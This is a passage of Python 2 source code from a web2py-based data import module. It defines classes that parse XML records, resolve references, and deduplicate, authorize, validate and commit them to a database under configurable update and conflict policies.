                                                )
        table.file.comment = DIV(_class="tooltip",
                                 _title="%s|%s" %
                                    (self.messages.import_file,
                                     self.messages.import_file_comment))
        table.file.label = self.messages.import_file
        table.status.requires = IS_IN_SET(import_upload_status, zero=None)
        table.status.represent = status_represent
        table.user_id.label = self.messages.user_name
        table.user_id.represent = user_name_represent
        table.created_on.default = now
        table.created_on.represent = self.date_represent
        table.modified_on.default = now
        table.modified_on.update = now
        table.modified_on.represent = self.date_represent

        table.replace_option.label = T("Replace")

        self.upload_table = db[self.UPLOAD_TABLE_NAME]

    # -------------------------------------------------------------------------
    @classmethod
    def define_upload_table(cls):
        """ Defines the upload table """

        db = current.db
        uploadfolder = os.path.join(current.request.folder,
                                    "uploads",
                                    )
        if cls.UPLOAD_TABLE_NAME not in db:
            upload_table = db.define_table(cls.UPLOAD_TABLE_NAME,
                    Field("controller",
                          readable=False,
                          writable=False),
                    Field("function",
                          readable=False,
                          writable=False),
                    Field("file", "upload",
                          uploadfolder=os.path.join(current.request.folder, "uploads", "imports"),
                          autodelete=True),
                    Field("filename",
                          readable=False,
                          writable=False),
                    Field("status", "integer",
                          default=1,
                          readable=False,
                          writable=False),
                    Field("extra_data",
                          readable=False,
                          writable=False),
                    Field("replace_option", "boolean",
                          default=False,
                          readable=False,
                          writable=False),
                    Field("job_id",
                          length=128,
                          readable=False,
                          writable=False),
                    Field("user_id", "integer",
                          readable=False,
                          writable=False),
                    Field("created_on", "datetime",
                          readable=False,
                          writable=False),
                    Field("modified_on", "datetime",
                          readable=False,
                          writable=False),
                    Field("summary_added", "integer",
                          readable=False,
                          writable=False),
                    Field("summary_error", "integer",
                          readable=False,
                          writable=False),
                    Field("summary_ignored", "integer",
                          readable=False,
                          writable=False),
                    Field("completed_details", "text",
                          readable=False,
                          writable=False))
        else:
            upload_table = db[cls.UPLOAD_TABLE_NAME]

        return upload_table

# =============================================================================
class S3ImportItem(object):
    """ Class representing an import item (=a single record) """

    METHOD = Storage(
        CREATE="create",
        UPDATE="update",
        DELETE="delete"
    )

    POLICY = Storage(
        THIS="THIS",                # keep local instance
        OTHER="OTHER",              # update unconditionally
        NEWER="NEWER",              # update if import is newer
        MASTER="MASTER"             # update if import is master
    )

    # -------------------------------------------------------------------------
    def __init__(self, job):
        """
            Constructor

            @param job: the import job this item belongs to
        """

        self.job = job
        self.ERROR = current.manager.ERROR

        # Locking and error handling
        self.lock = False
        self.error = None

        # Identification
        import uuid
        self.item_id = uuid.uuid4() # unique ID for this item
        self.id = None
        self.uid = None

        # Data elements
        self.table = None
        self.tablename = None
        self.element = None
        self.data = None
        self.original = None
        self.components = []
        self.references = []
        self.load_components = []
        self.load_references = []
        self.parent = None
        self.skip = False

        # Conflict handling
        self.mci = 2
        self.mtime = datetime.utcnow()
        self.modified = True
        self.conflict = False

        # Allowed import methods
        self.strategy = job.strategy
        # Update and conflict resolution policies
        self.update_policy = job.update_policy
        self.conflict_policy = job.conflict_policy

        # Actual import method
        self.method = None

        self.onvalidation = None
        self.onaccept = None

        # Item import status flags
        self.accepted = None
        self.permitted = False
        self.committed = False

        # Writeback hook for circular references:
        # Items which need a second write to update references
        self.update = []

    # -------------------------------------------------------------------------
    def __repr__(self):
        """ Helper method for debugging """

        _str = "<S3ImportItem %s {item_id=%s uid=%s id=%s error=%s data=%s}>" % \
               (self.table, self.item_id, self.uid, self.id, self.error, self.data)
        return _str

    # -------------------------------------------------------------------------
    def parse(self,
              element,
              original=None,
              table=None,
              tree=None,
              files=None):
        """
            Read data from a <resource> element

            @param element: the element
            @param table: the DB table
            @param tree: the import tree
            @param files: uploaded files

            @returns: True if successful, False if not (sets self.error)
        """

        db = current.db
        xml = current.xml
        manager = current.manager
        validate = manager.validate
        s3db = current.s3db

        self.element = element
        if table is None:
            tablename = element.get(xml.ATTRIBUTE.name, None)
            try:
                table = s3db[tablename]
            except:
                self.error = self.ERROR.BAD_RESOURCE
                element.set(xml.ATTRIBUTE.error, self.error)
                return False

        self.table = table
        self.tablename = table._tablename

        if original is None:
            original = manager.original(table, element)
        data = xml.record(table, element,
                          files=files,
                          original=original,
                          validate=validate)

        if data is None:
            self.error = self.ERROR.VALIDATION_ERROR
            self.accepted = False
            if not element.get(xml.ATTRIBUTE.error, False):
                element.set(xml.ATTRIBUTE.error, str(self.error))
            return False

        self.data = data

        if original is not None:
            self.original = original
            self.id = original[table._id.name]
            if xml.UID in original:
                self.uid = original[xml.UID]
                self.data.update({xml.UID:self.uid})
        elif xml.UID in data:
            self.uid = data[xml.UID]
        if xml.MTIME in data:
            self.mtime = data[xml.MTIME]
        if xml.MCI in data:
            self.mci = data[xml.MCI]

        _debug("New item: %s" % self)
        return True

    # -------------------------------------------------------------------------
    def deduplicate(self):

        RESOLVER = "deduplicate"

        if self.id:
            return

        table = self.table

        if table is None:
            return
        if self.original is not None:
            original = self.original
        else:
            original = current.manager.original(table, self.data)

        if original is not None:
            self.original = original
            self.id = original[table._id.name]
            UID = current.xml.UID
            if UID in original:
                self.uid = original[UID]
                self.data.update({UID:self.uid})
            self.method = self.METHOD.UPDATE
        else:
            resolve = current.s3db.get_config(self.tablename, RESOLVER)
            if self.data and resolve:
                resolve(self)

        return

    # -------------------------------------------------------------------------
    def authorize(self):
        """
            Authorize the import of this item, sets self.permitted
        """

        db = current.db
        manager = current.manager
        authorize = manager.permit

        self.permitted = False

        if not self.table:
            return False

        prefix = self.tablename.split("_", 1)[0]
        if prefix in manager.PROTECTED:
            return False

        if not authorize:
            self.permitted = True

        self.method = self.METHOD.CREATE
        if self.id:

            if self.data.deleted is True:
                self.method = self.METHOD.DELETE
                self.accepted = True

            else:
                if not self.original:
                    query = (self.table.id == self.id)
                    self.original = db(query).select(limitby=(0, 1)).first()
                if self.original:
                    self.method = self.METHOD.UPDATE

        if self.method == self.METHOD.CREATE:
            self.id = 0

        if authorize:
            self.permitted = authorize(self.method,
                                       self.tablename,
                                       record_id=self.id)

        return self.permitted

    # -------------------------------------------------------------------------
    def validate(self):
        """
            Validate this item (=record onvalidation), sets self.accepted
        """

        if self.accepted is not None:
            return self.accepted
        if self.data is None or not self.table:
            self.accepted = False
            return False

        form = Storage()
        form.method = self.method
        form.vars = self.data
        if self.id:
            form.vars.id = self.id
        form.errors = Storage()
        tablename = self.tablename
        key = "%s_onvalidation" % self.method
        s3db = current.s3db
        onvalidation = s3db.get_config(tablename, key,
                       s3db.get_config(tablename, "onvalidation"))
        if onvalidation:
            try:
                callback(onvalidation, form, tablename=tablename)
            except:
                pass # @todo need a better handler here.
        self.accepted = True
        if form.errors:
            error = current.xml.ATTRIBUTE.error
            for k in form.errors:
                e = self.element.findall("data[@field='%s']" % k)
                if not e:
                    e = self.element.findall("reference[@field='%s']" % k)
                if not e:
                    e = self.element
                    form.errors[k] = "[%s] %s" % (k, form.errors[k])
                else:
                    e = e[0]
                e.set(error,
                      str(form.errors[k]).decode("utf-8"))
            self.error = self.ERROR.VALIDATION_ERROR
            self.accepted = False
        return self.accepted

    # -------------------------------------------------------------------------
    def commit(self, ignore_errors=False):
        """
            Commit this item to the database

            @param ignore_errors: skip invalid components
                                  (still reports errors)
        """

        db = current.db
        s3db = current.s3db
        xml = current.xml
        manager = current.manager
        table = self.table

        # Check if already committed
        if self.committed:
            # already committed
            return True

        # If the parent item gets skipped, then skip this item as well
        if self.parent is not None and self.parent.skip:
            return True

        _debug("Committing item %s" % self)

        # Resolve references
        self._resolve_references()

        # Validate
        if not self.validate():
            _debug("Validation error: %s (%s)" % (self.error, xml.tostring(self.element, pretty_print=True)))
            self.skip = True
            return ignore_errors

        elif self.components:
            for component in self.components:
                if not component.validate():
                    if hasattr(component, "tablename"):
                        tn = component.tablename
                    else:
                        tn = None
                    _debug("Validation error, component=%s" % tn)
                    component.skip = True
                    # Skip this item on any component validation errors
                    # unless ignore_errors is True
                    if ignore_errors:
                        continue
                    else:
                        self.skip = True
                        return False

        # De-duplicate
        self.deduplicate()

        # Log this item
        if manager.log is not None:
            manager.log(self)

        # Authorize item
        if not self.authorize():
            _debug("Not authorized - skip")
            self.error = manager.ERROR.NOT_PERMITTED
            self.skip = True
            return ignore_errors

        _debug("Method: %s" % self.method)

        # Check if import method is allowed in strategy
        if not isinstance(self.strategy, (list, tuple)):
            self.strategy = [self.strategy]
        if self.method not in self.strategy:
            _debug("Method not in strategy - skip")
            self.error = manager.ERROR.NOT_PERMITTED
            self.skip = True
            return True

        this = self.original
        if not this and self.id and \
           self.method in (self.METHOD.UPDATE, self.METHOD.DELETE):
            query = (table.id == self.id)
            this = db(query).select(limitby=(0, 1)).first()
        this_mtime = None
        this_mci = 0
        if this:
            if xml.MTIME in table.fields:
                this_mtime = xml.as_utc(this[xml.MTIME])
            if xml.MCI in table.fields:
                this_mci = this[xml.MCI]
        self.mtime = xml.as_utc(self.mtime)

        # Conflict detection
        this_modified = True
        self.modified = True
        self.conflict = False
        last_sync = xml.as_utc(self.job.last_sync)
        if last_sync:
            if this_mtime and this_mtime < last_sync:
                this_modified = False
            if self.mtime and self.mtime < last_sync:
                self.modified = False
            if self.modified and this_modified:
                self.conflict = True

        if self.conflict and \
           self.method in (self.METHOD.UPDATE, self.METHOD.DELETE):
            _debug("Conflict: %s" % self)
            if self.job.onconflict:
                self.job.onconflict(self)

        if self.data is not None:
            data = Storage(self.data)
        else:
            data = Storage()

        # Update existing record
        if self.method == self.METHOD.UPDATE:

            if this:
                if "deleted" in this and this.deleted:
                    policy = self._get_update_policy(None)
                    if policy == self.POLICY.NEWER and \
                       this_mtime and this_mtime > self.mtime or \
                       policy == self.POLICY.MASTER and \
                       (this_mci == 0 or self.mci != 1):
                        self.skip = True
                        return True
                fields = data.keys()
                for f in fields:
                    if f not in this:
                        continue
                    if isinstance(this[f], datetime):
                        if xml.as_utc(data[f]) == xml.as_utc(this[f]):
                            del data[f]
                            continue
                    else:
                        if data[f] == this[f]:
                            del data[f]
                            continue
                    remove = False
                    policy = self._get_update_policy(f)
                    if policy == self.POLICY.THIS:
                        remove = True
                    elif policy == self.POLICY.NEWER:
                        if this_mtime and this_mtime > self.mtime:
                            remove = True
                    elif policy == self.POLICY.MASTER:
                        if this_mci == 0 or self.mci != 1:
                            remove = True
                    if remove:
                        del data[f]
                        self.data.update({f:this[f]})
                if "deleted" in this and this.deleted:
                    # Undelete re-imported records:
                    data.update(deleted=False)
                    if "deleted_fk" in table:
                        data.update(deleted_fk="")
                    if "created_by" in table:
                        data.update(created_by=table.created_by.default)
                    if "modified_by" in table:
                        data.update(modified_by=table.modified_by.default)

            if not self.skip and not self.conflict and \
               (len(data) or self.components or self.references):
                if self.uid and xml.UID in table:
                    data.update({xml.UID:self.uid})
                if xml.MTIME in table:
                    data.update({xml.MTIME: self.mtime})
                if xml.MCI in data:
                    # retain local MCI on updates
                    del data[xml.MCI]
                query = (table._id == self.id)
                try:
                    success = db(query).update(**dict(data))
                except:
                    self.error = sys.exc_info()[1]
                    self.skip = True
                    return False
                if success:
                    self.committed = True
            else:
                # Nothing to update
                self.committed = True

        # Create new record
        elif self.method == self.METHOD.CREATE:

            # Do not apply field policy to UID and MCI
            UID = xml.UID
            if UID in data:
                del data[UID]
            MCI = xml.MCI
            if MCI in data:
                del data[MCI]

            for f in data:
                policy = self._get_update_policy(f)
                if policy == self.POLICY.MASTER and self.mci != 1:
                    del data[f]

            if len(data) or self.components or self.references:

                # Restore UID and MCI
                if self.uid and UID in table.fields:
                    data.update({UID:self.uid})
                if MCI in table.fields:
                    data.update({MCI:self.mci})

                # Insert the new record
                try:
                    success = table.insert(**dict(data))
                except:
                    self.error = sys.exc_info()[1]
                    self.skip = True
                    return False
                if success:
                    self.id = success
                    self.committed = True

            else:
                # Nothing to create
                self.skip = True
                return True

        # Delete local record
        elif self.method == self.METHOD.DELETE:

            if this:
                if this.deleted:
                    self.skip = True
                policy = self._get_update_policy(None)
                if policy == self.POLICY.THIS:
                    self.skip = True
                elif policy == self.POLICY.NEWER and \
                     (this_mtime and this_mtime > self.mtime):
                    self.skip = True
                elif policy == self.POLICY.MASTER and \
                     (this_mci == 0 or self.mci != 1):
                    self.skip = True
            else:
                self.skip = True

            if not self.skip and not self.conflict:

                prefix, name = self.tablename.split("_", 1)
                resource = manager.define_resource(prefix, name, id=self.id)

                ondelete = s3db.get_config(self.tablename, "ondelete")
                success = resource.delete(ondelete=ondelete,
                                          cascade=True)
                if resource.error:
                    self.error = resource.error
                    self.skip = True
                    return ignore_errors

            _debug("Success: %s, id=%s %sd" % (self.tablename, self.id,
                                               self.skip and "skippe" or \
                                               self.method))
            return True

        # Audit + onaccept on successful commits
        if self.committed:
            form = Storage()
            form.method = self.method
            form.vars = self.data
            tablename = self.tablename
            prefix, name = tablename.split("_", 1)
            if self.id:
                form.vars.id = self.id
            if manager.audit is not None:
                manager.audit(self.method, prefix, name,
                              form=form,
                              record=self.id,
                              representation="xml")
            s3db.update_super(table, form.vars)
            if self.method == self.METHOD.CREATE:
                current.auth.s3_set_record_owner(table, self.id)
            key = "%s_onaccept" % self.method
            onaccept = s3db.get_config(tablename, key,
                       s3db.get_config(tablename, "onaccept"))
            if onaccept:
                callback(onaccept, form, tablename=self.tablename)

        # Update referencing items
        if self.update and self.id:
            for u in self.update:
                item = u.get("item", None)
                if not item:
                    continue
                field = u.get("field", None)
                if isinstance(field, (list, tuple)):
                    pkey, fkey = field
                    query = table.id == self.id
                    row = db(query).select(table[pkey],
                                           limitby=(0, 1)).first()
                    if row:
                        item._update_reference(fkey, row[pkey])
                else:
                    item._update_reference(field, self.id)

        _debug("Success: %s, id=%s %sd" % (self.tablename, self.id,
                                           self.skip and "skippe" or \
                                           self.method))
        return True

    # -------------------------------------------------------------------------
    def _get_update_policy(self, field):
        """
            Get the update policy for a field (if the item will
            update an existing record)

            @param field: the name of the field
        """

        if isinstance(self.update_policy, dict):
            r = self.update_policy.get(field,
                self.update_policy.get("__default__", self.POLICY.THIS))
        else:
            r = self.update_policy
        if not r in self.POLICY.values():
            r = self.POLICY.THIS
        return r

    # -------------------------------------------------------------------------
    def _resolve_references(self):
        """
            Resolve the references of this item (=look up all foreign
            keys from other items of the same job). If a foreign key
            is not yet available, it will be scheduled for later update.
        """

        if not self.table:
            return

        items = self.job.items
        for reference in self.references:

            item = None
            field = reference.field
            entry = reference.entry
            if not entry:
                continue

            # Resolve key tuples
            if isinstance(field, (list,tuple)):
                pkey, fkey = field
            else:
                pkey, fkey = ("id", field)

            # Resolve the key table name
            ktablename, key, multiple = s3_get_foreign_key(self.table[fkey])
            if not ktablename:
                if self.tablename == "auth_user" and \
                   fkey == "organisation_id":
                    ktablename = "org_organisation"
                else:
                    continue
            if entry.tablename:
                ktablename = entry.tablename
            try:
                ktable = current.s3db[ktablename]
            except:
                continue

            # Resolve the foreign key (value)
            fk = entry.id
            if entry.item_id:
                item = items[entry.item_id]
                if item:
                    fk = item.id
            if fk and pkey != "id":
                row = current.db(ktable._id == fk).select(ktable[pkey],
                                                          limitby=(0, 1)).first()
                if not row:
                    fk = None
                    continue
                else:
                    fk = row[pkey]

            # Update record data
            if fk:
                if multiple:
                    val = self.data.get(fkey, [])
                    if fk not in val:
                        val.append(fk)
                    self.data[fkey] = val
                else:
                    self.data[fkey] = fk
            else:
                if fkey in self.data and not multiple:
                    del self.data[fkey]
                if item:
                    item.update.append(dict(item=self, field=fkey))

    # -------------------------------------------------------------------------
    def _update_reference(self, field, value):
        """
            Helper method to update a foreign key in an already written
            record. Will be called by the referenced item after (and only
            if) it has been committed. This is only needed if the reference
            could not be resolved before commit due to circular references.

            @param field: the field name of the foreign key
            @param value: the value of the foreign key
        """

        if not value or not self.table:
            return
        db = current.db
        if self.id and self.permitted:
            fieldtype = str(self.table[field].type)
            if fieldtype.startswith("list:reference"):
                query = (self.table.id == self.id)
                record = db(query).select(self.table[field],
                                          limitby=(0,1)).first()
                if record:
                    values = record[field]
                    if value not in values:
                        values.append(value)
                        db(self.table.id == self.id).update(**{field:values})
            else:
                db(self.table.id == self.id).update(**{field:value})

    # -------------------------------------------------------------------------
    def store(self, item_table=None):
        """
            Store this item in the DB
        """

        _debug("Storing item %s" % self)
        if item_table is None:
            return None
        db = current.db
        query = item_table.item_id == self.item_id
        row = db(query).select(item_table.id, limitby=(0, 1)).first()
        if row:
            record_id = row.id
        else:
            record_id = None
        record = Storage(job_id = self.job.job_id,
                         item_id = self.item_id,
                         tablename = self.tablename,
                         record_uid = self.uid,
                         error = self.error)
        if self.element is not None:
            element_str = current.xml.tostring(self.element,
                                               xml_declaration=False)
            record.update(element=element_str)
        if self.data is not None:
            data = Storage()
            for f in self.data.keys():
                table = self.table
                if f not in table.fields:
                    continue
                fieldtype = str(self.table[f].type)
                if fieldtype == "id" or s3_has_foreign_key(self.table[f]):
                    continue
                data.update({f:self.data[f]})
            data_str = cPickle.dumps(data)
            record.update(data=data_str)
        ritems = []
        for reference in self.references:
            field = reference.field
            entry = reference.entry
            store_entry = None
            if entry:
                if entry.item_id is not None:
                    store_entry = dict(field=field,
                                       item_id=str(entry.item_id))
                elif entry.uid is not None:
                    store_entry = dict(field=field,
                                       tablename=entry.tablename,
                                       uid=str(entry.uid))
                if store_entry is not None:
                    ritems.append(json.dumps(store_entry))
        if ritems:
            record.update(ritems=ritems)
        citems = [c.item_id for c in self.components]
        if citems:
            record.update(citems=citems)
        if self.parent:
            record.update(parent=self.parent.item_id)
        if record_id:
            db(item_table.id == record_id).update(**record)
        else:
            record_id = item_table.insert(**record)
        _debug("Record ID=%s" % record_id)
        return record_id

    # -------------------------------------------------------------------------
    def restore(self, row):
        """
            Restore an item from a item table row. This does not restore
            the references (since this can not be done before all items
            are restored), must call job.restore_references() to do that

            @param row: the item table row
        """

        xml = current.xml

        self.item_id = row.item_id
        self.accepted = None
        self.permitted = False
        self.committed = False
        tablename = row.tablename
        self.id = None
        self.uid = row.record_uid
        if row.data is not None:
            self.data = cPickle.loads(row.data)
        else:
            self.data = Storage()
        data = self.data
        if xml.MTIME in data:
            self.mtime = data[xml.MTIME]
        if xml.MCI in data:
            self.mci = data[xml.MCI]
        UID = xml.UID
        if UID in data:
            self.uid = data[UID]
        self.element = etree.fromstring(row.element)
        if row.citems:
            self.load_components = row.citems
        if row.ritems:
            self.load_references = [json.loads(ritem) for ritem in row.ritems]
        self.load_parent = row.parent
        try:
            table = current.s3db[tablename]
        except:
            self.error = self.ERROR.BAD_RESOURCE
            return False
        else:
            self.table = table
            self.tablename = tablename
        original = current.manager.original(table, self.data)
        if original is not None:
            self.original = original
            self.id = original[table._id.name]
            if UID in original:
                self.uid = original[UID]
                self.data.update({UID:self.uid})
        self.error = row.error
        if self.error and not self.data:
            # Validation error
            return False
        return True

# =============================================================================
class S3ImportJob():
    """
        Class to import an element tree into the database
    """

    JOB_TABLE_NAME = "s3_import_job"
    ITEM_TABLE_NAME = "s3_import_item"

    # -------------------------------------------------------------------------
    def __init__(self, manager, table,
                 tree=None,
                 files=None,
                 job_id=None,
                 strategy=None,
                 update_policy=None,
                 conflict_policy=None,
                 last_sync=None,
                 onconflict=None):
        """
            Constructor

            @param manager: the S3RequestManager instance performing this job
            @param tree: the element tree to import
            @param files: files attached to the import (for upload fields)
            @param job_id: restore job from database (record ID or job_id)
            @param strategy: the import strategy
            @param update_policy: the update policy
            @param conflict_policy: the conflict resolution policy
            @param last_sync: the last synchronization time stamp (datetime)
            @param onconflict: custom conflict resolver function
        """

        self.error = None # the last error
        self.error_tree = etree.Element(current.xml.TAG.root)

        self.table = table
        self.tree = tree
        self.files = files
        self.directory = Storage()

        self.elements = Storage()
        self.items = Storage()
        self.references = []

        self.job_table = None
        self.item_table = None

        self.count = 0 # total number of records imported
        self.created = [] # IDs of created records
        self.updated = [] # IDs of updated records
        self.deleted = [] # IDs of deleted records

        # Import strategy
        self.strategy = strategy
        if self.strategy is None:
            self.strategy = [S3ImportItem.METHOD.CREATE,
                             S3ImportItem.METHOD.UPDATE,
                             S3ImportItem.METHOD.DELETE]
        if not isinstance(self.strategy, (tuple, list)):
            self.strategy = [self.strategy]

        # Update policy (default=always update)
        self.update_policy = update_policy
        if not self.update_policy:
            self.update_policy = S3ImportItem.POLICY.OTHER
        # Conflict resolution policy (default=always update)
        self.conflict_policy = conflict_policy
        if not self.conflict_policy:
            self.conflict_policy = S3ImportItem.POLICY.OTHER

        # Synchronization settings
        self.mtime = None
        self.last_sync = last_sync
        self.onconflict = onconflict

        if job_id:
            self.__define_tables()
            jobtable = self.job_table
            if str(job_id).isdigit():
                query = jobtable.id == job_id
            else:
                query = jobtable.job_id == job_id
            row = current.db(query).select(limitby=(0, 1)).first()
            if not row:
                raise SyntaxError("Job record not found")
            self.job_id = row.job_id
            if not self.table:
                tablename = row.tablename
                try:
                    table = current.s3db[tablename]
                except:
                    pass
        else:
            import uuid
            self.job_id = uuid.uuid4() # unique ID for this job

    # -------------------------------------------------------------------------
    def add_item(self,
                 element=None,
                 original=None,
                 components=None,
                 parent=None,
                 joinby=None):
        """
            Parse and validate an XML element and add it as new item
            to the job.

            @param element: the element
            @param original: the original DB record (if already available,
                             will otherwise be looked-up by this function)
            @param components: a dictionary of components (as in S3Resource)
                               to include in the job (defaults to all
                               defined components)
            @param parent: the parent item (if this is a component)
            @param joinby: the component join key(s) (if this is a component)

            @returns: a unique identifier for the new item, or None if there
                      was an error. self.error contains the last error, and
                      self.error_tree an element tree with all failing elements
                      including error attributes.
        """

        if element in self.elements:
            # element has already been added to this job
            return self.elements[element]

        # Parse the main element
        item = S3ImportItem(self)

        # Update lookup lists
        item_id = item.item_id
        self.items[item_id] = item
        if element is not None:
            self.elements[element] = item_id

        if not item.parse(element,
                          original=original,
                          files=self.files):
            self.error = item.error
            item.accepted = False
            if parent is None:
                self.error_tree.append(deepcopy(item.element))

        else:
            # Now parse the components
            table = item.table
            components = current.s3db.get_components(table, names=components)

            cnames = Storage()
            cinfos = Storage()
            for alias in components:
                component = components[alias]
                pkey = component.pkey
                if component.linktable:
                    ctable = component.linktable
                    fkey = component.lkey
                else:
                    ctable = component.table
                    fkey = component.fkey
                ctablename = ctable._tablename
                if ctablename in cnames:
                    cnames[ctablename].append(alias)
                else:
                    cnames[ctablename] = [alias]
                cinfos[(ctablename, alias)] = Storage(component = component,
                                                      ctable = ctable,
                                                      pkey = pkey,
                                                      fkey = fkey,
                                                      original = None,
                                                      uid = None)
            add_item = self.add_item
            xml = current.xml
            for celement in xml.components(element, names=cnames.keys()):

                # Get the component tablename
                ctablename = celement.get(xml.ATTRIBUTE.name, None)
                if not ctablename:
                    continue

                # Get the component alias (for disambiguation)
                calias = celement.get(xml.ATTRIBUTE.alias, None)
                if calias is None:
                    if ctablename not in cnames:
                        continue
                    aliases = cnames[ctablename]
                    if len(aliases) == 1:
                        calias = aliases[0]
                    else:
                        # ambiguous components *must* use alias
                        continue
                if (ctablename, calias) not in cinfos:
                    continue
                else:
                    cinfo = cinfos[(ctablename, calias)]

                component = cinfo.component
                original = cinfo.original
                ctable = cinfo.ctable
                pkey = cinfo.pkey
                fkey = cinfo.fkey
                if not component.multiple:
                    if cinfo.uid is not None:
                        continue
                    if original is None and item.id:
                        query = (table.id == item.id) & \
                                (table[pkey] == ctable[fkey])
                        original = current.db(query).select(ctable.ALL,
                                                            limitby=(0, 1)).first()
                    if original:
                        cinfo.uid = uid = original.get(xml.UID, None)
                        celement.set(xml.UID, uid)
                    cinfo.original = original

                item_id = add_item(element=celement,
                                   original=original,
                                   parent=item,
                                   joinby=(pkey, fkey))
                if item_id is None:
                    item.error = self.error
                    self.error_tree.append(deepcopy(item.element))
                else:
                    citem = self.items[item_id]
                    citem.parent = item
                    item.components.append(citem)

            # Handle references
            table = item.table
            tree = self.tree
            if tree is not None:
                fields = [table[f] for f in table.fields]
                rfields = filter(s3_has_foreign_key, fields)
                item.references = self.lookahead(element,
                                                 table=table,
                                                 fields=rfields,
                                                 tree=tree,
                                                 directory=self.directory)
                for reference in item.references:
                    entry = reference.entry
                    if entry and entry.element is not None:
                        item_id = add_item(element=entry.element)
                        if item_id:
                            entry.update(item_id=item_id)

            # Parent reference
            if parent is not None:
                entry = Storage(item_id=parent.item_id,
                                element=parent.element,
                                tablename=parent.tablename)
                item.references.append(Storage(field=joinby,
                                               entry=entry))

        return item.item_id

    # -------------------------------------------------------------------------
    def lookahead(self,
                  element,
                  table=None,
                  fields=None,
                  tree=None,
                  directory=None):
        """
            Find referenced elements in the tree

            @param element: the element
            @param table: the DB table
            @param fields: the FK fields in the table
            @param tree: the import tree
            @param directory: a dictionary to lookup elements in the tree
                              (will be filled in by this function)
        """

        db = current.db
        s3db = current.s3db
        xml = current.xml
        import_uid = xml.import_uid
        ATTRIBUTE = xml.ATTRIBUTE
        TAG = xml.TAG
        UID = xml.UID
        reference_list = []

        root = None
        if tree is not None:
            if isinstance(tree, etree._Element):
                root = tree
            else:
                root = tree.getroot()
        references = element.findall("reference")
        for reference in references:
            field = reference.get(ATTRIBUTE.field, None)
            # Ignore references without valid field-attribute
            if not field or field not in fields:
                continue
            # Find the key table
            multiple = False
            fieldtype = str(table[field].type)
            if fieldtype.startswith("reference"):
                ktablename = fieldtype[10:]
            elif fieldtype.startswith("list:reference"):
                ktablename = fieldtype[15:]
                multiple = True
            else:
                # ignore if the field is not a reference type
                continue
            try:
                ktable = s3db[ktablename]
            except:
                # Invalid tablename - skip
                continue
            tablename = reference.get(ATTRIBUTE.resource, None)
            # Ignore references to tables without UID field:
            if UID not in ktable.fields:
                continue
            # Fall back to key table name if tablename is not specified:
            if not tablename:
                tablename = ktablename
            # Super-entity references must use the super-key:
            if tablename != ktablename:
                field = (ktable._id.name, field)
            # Ignore direct references to super-entities:
            if tablename == ktablename and ktable._id.name != "id":
                continue
            # Get the foreign key
            uids = reference.get(UID, None)
            attr = UID
            if not uids:
                uids = reference.get(ATTRIBUTE.tuid, None)
                attr = ATTRIBUTE.tuid
            if uids and multiple:
                uids = json.loads(uids)
            elif uids:
                uids = [uids]

            # Find the elements and map to DB records
            relements = []

            # Create a UID<->ID map
            id_map = Storage()
            if attr == UID and uids:
                _uids = map(import_uid, uids)
                query = ktable[UID].belongs(_uids)
                records = db(query).select(ktable.id,
                                           ktable[UID])
                id_map = dict([(r[UID], r.id) for r in records])

            if not uids:
                # Anonymous reference: <resource> inside the element
                expr = './/%s[@%s="%s"]' % (TAG.resource,
                                            ATTRIBUTE.name,
                                            tablename)
                relements = reference.xpath(expr)
                if relements and not multiple:
                    relements = [relements[0]]

            elif root is not None:

                for uid in uids:

                    entry = None
                    # Entry already in directory?
                    if directory is not None:
                        entry = directory.get((tablename, attr, uid), None)
                    if not entry:
                        expr = ".//%s[@%s='%s' and @%s='%s']" % (
                                    TAG.resource,
                                    ATTRIBUTE.name,
                                    tablename,
                                    attr,
                                    uid)
                        e = root.xpath(expr)
                        if e:
                            # Element in the source => append to relements
                            relements.append(e[0])
                        else:
                            # No element found, see if original record exists
                            _uid = import_uid(uid)
                            if _uid and _uid in id_map:
                                _id = id_map[_uid]
                                entry = Storage(tablename=tablename,
                                                element=None,
                                                uid=uid,
                                                id=_id,
                                                item_id=None)
                                reference_list.append(Storage(field=field,
                                                              entry=entry))
                            else:
                                continue
                    else:
                        reference_list.append(Storage(field=field,
                                                      entry=entry))

            # Create entries for all newly found elements
            for relement in relements:
                uid = relement.get(attr, None)
                if attr == UID:
                    _uid = import_uid(uid)
                    id = _uid and id_map and id_map.get(_uid, None) or None
                else:
                    _uid = None
                    id = None
                entry = Storage(tablename=tablename,
                                element=relement,
                                uid=uid,
                                id=id,
                                item_id=None)
                # Add entry to directory
                if uid and directory is not None:
                    directory[(tablename, attr, uid)] = entry
                # Append the entry to the reference list
                reference_list.append(Storage(field=field, entry=entry))

        return reference_list

    # -------------------------------------------------------------------------
    def load_item(self, row):
        """
            Load an item from the item table (counterpart to add_item
            when restoring a job from the database)
        """

        item = S3ImportItem(self)
        if not item.restore(row):
            self.error = item.error
            if item.load_parent is None:
                self.error_tree.append(deepcopy(item.element))
        # Update lookup lists
        item_id = item.item_id
        self.items[item_id] = item
        return item_id

    # -------------------------------------------------------------------------
    def resolve(self, item_id, import_list):
        """
            Resolve the reference list of an item

            @param item_id: the import item UID
            @param import_list: the ordered list of items (UIDs) to import
        """

        item = self.items[item_id]
        if item.lock or item.accepted is False:
            return False
        references = []
        for reference in item.references:
            ritem_id = reference.entry.item_id
            if ritem_id and ritem_id not in import_list:
                references.append(ritem_id)
        for ritem_id in references:
            item.lock = True
            if self.resolve(ritem_id, import_list):
                import_list.append(ritem_id)
            item.lock = False
        return True

    # -------------------------------------------------------------------------
    def commit(self, ignore_errors=False):
        """
            Commit the import job to the DB

            @param ignore_errors: skip any items with errors
                                  (does still report the errors)
        """

        ATTRIBUTE = current.xml.ATTRIBUTE

        # Resolve references
        import_list = []
        for item_id in self.items:
            self.resolve(item_id, import_list)
            if item_id not in import_list:
                import_list.append(item_id)
        # Commit the items
        items = self.items
        count = 0
        mtime = None
        created = []
        cappend = created.append
        updated = []
        deleted = []
        tablename = self.table._tablename
        for item_id in import_list:
            item = items[item_id]
            error = None
            success = item.commit(ignore_errors=ignore_errors)
            error = item.error
            if error:
                self.error = error
                element = item.element
                if element is not None:
                    if not element.get(ATTRIBUTE.error, False):
                        element.set(ATTRIBUTE.error, str(self.error))
                    self.error_tree.append(deepcopy(element))
                if not ignore_errors:
                    return False
            elif item.tablename == tablename:
                count += 1
                if mtime is None or item.mtime > mtime:
                    mtime = item.mtime
                if item.id:
                    if item.method == item.METHOD.CREATE:
                        cappend(item.id)
                    elif item.method == item.METHOD.UPDATE:
                        updated.append(item.id)
                    elif item.method == item.METHOD.DELETE:
                        deleted.append(item.id)
        self.count = count
        self.mtime = mtime
